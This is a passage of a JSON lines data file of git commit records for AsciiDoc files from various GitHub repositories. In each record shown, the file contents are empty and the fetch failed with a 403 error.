2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b7b3381ae8f47209c8bdcb4650a74201b11fa08","subject":"Add an index file, to make GH pages happy","message":"Add an index file, to make GH pages happy\n","repos":"divvun\/kbdgen,divvun\/kbdgen,divvun\/kbdgen","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/divvun\/kbdgen.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68ad464b676486620bf1f5c254e819c3ad810492","subject":"Add minimal Contributor guidelines","message":"Add minimal Contributor guidelines\n","repos":"vpavic\/spring-session,vpavic\/spring-session,vpavic\/spring-session","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vpavic\/spring-session.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"adfaeeccadedce2631c060000d90983651b32cc5","subject":"Added a readme","message":"Added a readme\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"28a4eb45102c0ba76b30b832331a731bc6cff391","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5be8ec9bb848034b215a5f61adda36fc36be98c8","subject":"Minor wording Ecl","message":"Minor wording Ecl\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30e6e5da24c6ccec28555720e04eb1eaa3f47708","subject":"Update License info","message":"Update License info","repos":"prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle,waratek\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"610bf708a77f10f5386b85978da23d95646863e9","subject":"Updated README","message":"Updated README\n","repos":"logicus4078\/vertx-jdbc-client,ckaminski\/vertx-jdbc-client,logicus4078\/vertx-jdbc-client,logicus4078\/vertx-jdbc-client,vert-x3\/vertx-jdbc-client,ckaminski\/vertx-jdbc-client,ckaminski\/vertx-jdbc-client","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-jdbc-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bf85445bea60c09af15025e7ddd577c18a8b3ea6","subject":"Update 2016-07-16-Welcome-to-Integral-Morphology.adoc","message":"Update 2016-07-16-Welcome-to-Integral-Morphology.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-16-Welcome-to-Integral-Morphology.adoc","new_file":"_posts\/2016-07-16-Welcome-to-Integral-Morphology.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"848c94246ff153a3c542e6c4b048eac155db8086","subject":"y2b create post You've Never Seen A Mug Do This...","message":"y2b create post You've Never Seen A Mug Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-27-Youve-Never-Seen-A-Mug-Do-This.adoc","new_file":"_posts\/2017-05-27-Youve-Never-Seen-A-Mug-Do-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63938319b4f91e11b4b09fdac108c4b830a880a5","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-and-Hue-bridge-20.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbb92c65c253183fdc4b3c3869af79211d2046f8","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b7b4d9f01c943d4035dbb82b9c30954d5d00f90","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5aed548cccb8bfb263c0b2691111d4e498ff5198","subject":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","message":"Publish DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_file":"DS_Store-Introduction-a-Introduction-a-Prometheus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bf52a616456497eec94048f1de6204124e20d7a7","subject":"[release] Announcement of Debezium 0.10.0.Beta3","message":"[release] Announcement of Debezium 0.10.0.Beta3\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-07-25-debezium-0-10-0-beta3-released.adoc","new_file":"blog\/2019-07-25-debezium-0-10-0-beta3-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f5d57791fbc3bc07bd10ca11051cc7af742439d","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b035d4986ab54f20d119a069449a2325d6cd2d54","subject":"Update 2016-7-19-and.adoc","message":"Update 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-19-and.adoc","new_file":"_posts\/2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4cfa7065a55c56633a6a2f5b70c3238031f0dea9","subject":"Update 2017-09-17-mixed-content-checker.adoc","message":"Update 2017-09-17-mixed-content-checker.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_file":"_posts\/2017-09-17-mixed-content-checker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41b666f8321699130beaaf1f93bcd90d5379b0dc","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","message":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0b5771a1586c5e38a05634724615cf20d9be163","subject":"Update 2017-05-05-Jigsaw-rererere-fait-parler-de-lui.adoc","message":"Update 2017-05-05-Jigsaw-rererere-fait-parler-de-lui.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-05-05-Jigsaw-rererere-fait-parler-de-lui.adoc","new_file":"_posts\/2017-05-05-Jigsaw-rererere-fait-parler-de-lui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b90483bbd7b2ab6d42a339fec694479da5262cd6","subject":"Update 2016-X-X-X-X-Using-Geppetto-and-J-Ruby-to-create-Puppet-module.adoc","message":"Update 2016-X-X-X-X-Using-Geppetto-and-J-Ruby-to-create-Puppet-module.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2016-X-X-X-X-Using-Geppetto-and-J-Ruby-to-create-Puppet-module.adoc","new_file":"_posts\/2016-X-X-X-X-Using-Geppetto-and-J-Ruby-to-create-Puppet-module.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c661c459e74e5fbed44c516046d30690b4b5ac4","subject":"Import CIP2013-09-06","message":"Import CIP2013-09-06\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2013-09-06.asciidoc","new_file":"cip\/CIP2013-09-06.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f2b939607100a685afb7ccb5c2f4885b11b1d40","subject":"Started Datastore ref doc with current features (#949)","message":"Started Datastore ref doc with current features (#949)\n\n* Started Datastore ref doc with current features\r\n\r\n* typo\r\n\r\n* pr comments\r\n\r\n* pr comments\r\n","repos":"spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,spring-cloud\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp,GoogleCloudPlatform\/spring-cloud-gcp","old_file":"spring-cloud-gcp-docs\/src\/main\/asciidoc\/datastore.adoc","new_file":"spring-cloud-gcp-docs\/src\/main\/asciidoc\/datastore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-gcp.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"80669e467f28604f4b630a56516e065814337014","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/managers_and_pms.adoc","new_file":"content\/writings\/managers_and_pms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3d680d23e4e9fcf8fe962343744e7fa08ddaa25f","subject":"Update 2015-5-10-uGUI.adoc","message":"Update 2015-5-10-uGUI.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-5-10-uGUI.adoc","new_file":"_posts\/2015-5-10-uGUI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa0398f45f9a527737b09c6fcc0a262a6ba711b6","subject":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","message":"Update 2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_file":"_posts\/2015-05-10-Blowing-up-pixel-art-on-the-Web.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"472c2b075dac2471a027d06640b57ded8c70781a","subject":"Regen full","message":"Regen full\n","repos":"apache\/camel,apache\/camel,christophd\/camel,tadayosi\/camel,nikhilvibhav\/camel,christophd\/camel,cunningt\/camel,christophd\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,pax95\/camel,cunningt\/camel,tadayosi\/camel,tdiesler\/camel,tadayosi\/camel,apache\/camel,apache\/camel,adessaigne\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,adessaigne\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,adessaigne\/camel,nikhilvibhav\/camel,pax95\/camel,nikhilvibhav\/camel,pax95\/camel,christophd\/camel,apache\/camel,tdiesler\/camel,tadayosi\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,tdiesler\/camel,nikhilvibhav\/camel,pax95\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,pax95\/camel","old_file":"catalog\/camel-catalog\/src\/generated\/resources\/org\/apache\/camel\/catalog\/docs\/yaml-dsl.adoc","new_file":"catalog\/camel-catalog\/src\/generated\/resources\/org\/apache\/camel\/catalog\/docs\/yaml-dsl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"696836c6db910630a8cf550758e30ff580e0183d","subject":"y2b create post Galaxy S4 vs iPhone 5 vs Nexus 4","message":"y2b create post Galaxy S4 vs iPhone 5 vs Nexus 4","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-14-Galaxy-S4-vs-iPhone-5-vs-Nexus-4.adoc","new_file":"_posts\/2013-03-14-Galaxy-S4-vs-iPhone-5-vs-Nexus-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb9c457c349100aa4d3bbfe2907f63438b18dce6","subject":"Added basic running instructions","message":"Added basic running instructions\n","repos":"hawkular\/hawkular-services,hawkular\/hawkular-services","old_file":"RUNNING.adoc","new_file":"RUNNING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hawkular\/hawkular-services.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ab400edf380626da7a3f1eba64e294cafb214626","subject":"Motivation for monad transformers","message":"Motivation for monad transformers\n","repos":"tcsavage\/cats,mccraigmccraig\/cats,funcool\/cats,alesguzik\/cats,OlegTheCat\/cats,yurrriq\/cats","old_file":"doc\/cats.asciidoc","new_file":"doc\/cats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yurrriq\/cats.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"c52d0d3ba6fa5bef3d1369c09f87e32c010566dc","subject":"Update 2018-05-01-Shakespeare-be-my-love-en-el-Auditorio-de-La-Alberca-Murcia.adoc","message":"Update 2018-05-01-Shakespeare-be-my-love-en-el-Auditorio-de-La-Alberca-Murcia.adoc","repos":"ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es,ditirambo\/ditirambo.es","old_file":"_posts\/2018-05-01-Shakespeare-be-my-love-en-el-Auditorio-de-La-Alberca-Murcia.adoc","new_file":"_posts\/2018-05-01-Shakespeare-be-my-love-en-el-Auditorio-de-La-Alberca-Murcia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ditirambo\/ditirambo.es.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff8648f4cd4eb365908a4a3d05e155d36f32ebc8","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a89299c06a8d47453cf7042e6a8614260a78ca23","subject":"Update 2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","message":"Update 2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","new_file":"_posts\/2015-08-06-Developers-prepare-your-project-to-git-clone-docker-compose-up-pattern.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"19c2591130ee41193aed6374af4d46ba91b5614e","subject":"Update 2018-09-15-Hack-The-Box-Stratosphere.adoc","message":"Update 2018-09-15-Hack-The-Box-Stratosphere.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2018-09-15-Hack-The-Box-Stratosphere.adoc","new_file":"_posts\/2018-09-15-Hack-The-Box-Stratosphere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be976a66407045c11432c8644995c68b1a78cac1","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/dtfabric,libyal\/dtfabric","old_file":"documentation\/Data types fabric (dtFabric) format.asciidoc","new_file":"documentation\/Data types fabric (dtFabric) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtfabric.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f2cec945bc54a485b92b8b1bd75cda75f17085cc","subject":"Update readme.asciidoc","message":"Update readme.asciidoc\n\nlegal\/license note","repos":"brechin\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,lillian-lemmer\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,hypatia-software-org\/hypatia-engine","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64553739c711af506df6503a767331bb6c6f98a1","subject":"Add news\/2018-05-07-forge-3.9.0.final.asciidoc","message":"Add news\/2018-05-07-forge-3.9.0.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2018-05-07-forge-3.9.0.final.asciidoc","new_file":"news\/2018-05-07-forge-3.9.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2d3d91f203b68fc38e3f9fa4e2d51e9fad14bf84","subject":"new blog","message":"new blog\n","repos":"tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,jsanda\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2016\/01\/21\/hawkular-command-gateway-clients.adoc","new_file":"src\/main\/jbake\/content\/blog\/2016\/01\/21\/hawkular-command-gateway-clients.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cd2566d5d24d0874de41df35f7f6d8b5ab934219","subject":"Started on roadmap doc","message":"Started on roadmap doc\n","repos":"fhaynes\/iridium,fhaynes\/iridium","old_file":"docs\/roadmap.adoc","new_file":"docs\/roadmap.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhaynes\/iridium.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddba77f84e22a77b1ab7c553da7b41d07d89fa86","subject":"Document code rules.","message":"Document code rules.\n","repos":"tourea\/docker-java,gesellix\/docker-java,ollie314\/docker-java,tejksat\/docker-java,docker-java\/docker-java,tourea\/docker-java,magnayn\/docker-java,llamahunter\/docker-java,ollie314\/docker-java,docker-java\/docker-java,llamahunter\/docker-java,tejksat\/docker-java,magnayn\/docker-java,gesellix\/docker-java","old_file":"docs\/devel.adoc","new_file":"docs\/devel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docker-java\/docker-java.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed09c968a3598236e3a71b86aa7d9a7fe40b36d8","subject":"tuned based on feedback from Serge","message":"tuned based on feedback from Serge\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7353806775ece8a8926e97ad83ea5b2433d4a8cd","subject":"Update 2017-05-31-TWCTF-2017.adoc","message":"Update 2017-05-31-TWCTF-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fdf0029d57bee77780dc837f5245a7c9e9e4b15","subject":"Update 2018-10-09-Azure-Devops-Pipelines-unlink-from-your-github-account.adoc","message":"Update 2018-10-09-Azure-Devops-Pipelines-unlink-from-your-github-account.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2018-10-09-Azure-Devops-Pipelines-unlink-from-your-github-account.adoc","new_file":"_posts\/2018-10-09-Azure-Devops-Pipelines-unlink-from-your-github-account.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d053a5c43d78ef7a00bc9b9729f9d0321366af8","subject":"Adds the STARTS WITH and ENDS WITH CIP","message":"Adds the STARTS WITH and ENDS WITH CIP\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/CIP2015-09-15-STARTS-WITH-and-ENDS-WITH.adoc","new_file":"cip\/CIP2015-09-15-STARTS-WITH-and-ENDS-WITH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"49f906643ff2df85685f59ce094b1677e00f9041","subject":"archives news of July 2014","message":"archives news of July 2014\n","repos":"llaville\/asciidoc-bootstrap-backend,llaville\/asciidoc-bootstrap-backend","old_file":"blog\/201407.asciidoc","new_file":"blog\/201407.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/llaville\/asciidoc-bootstrap-backend.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4e179c15587b3e2369279d98ed3e2c78f8c61949","subject":"Added Camel 2.19.0 release notes to docs","message":"Added Camel 2.19.0 release notes to 